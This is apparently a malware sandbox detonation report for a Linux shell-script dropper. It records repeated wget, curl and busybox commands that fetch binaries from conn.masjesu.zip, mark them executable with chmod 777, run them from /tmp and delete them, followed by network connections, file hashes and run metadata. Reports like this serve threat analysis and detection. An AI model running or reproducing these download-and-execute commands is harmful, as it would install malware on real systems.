[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/chmod

[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319

[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/rm

[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/chmod

[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ

[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/rm

[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/chmod

[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3

[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/rm

[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/chmod

[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0

[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/rm

[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/chmod

[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6

[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/rm

[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/chmod

[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ

[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/rm

[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/chmod

[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3

[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/rm

[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/chmod

[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0

[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/rm

[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/chmod

[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6

[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/rm

[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/chmod

[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319

[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/rm

[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

MD5 546071c6a6aeff34580b4d1a9b35a7c3
SHA1 dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA256 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 01:50

Reported

2024-10-18 01:52

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

131s

Command Line

[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh

[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

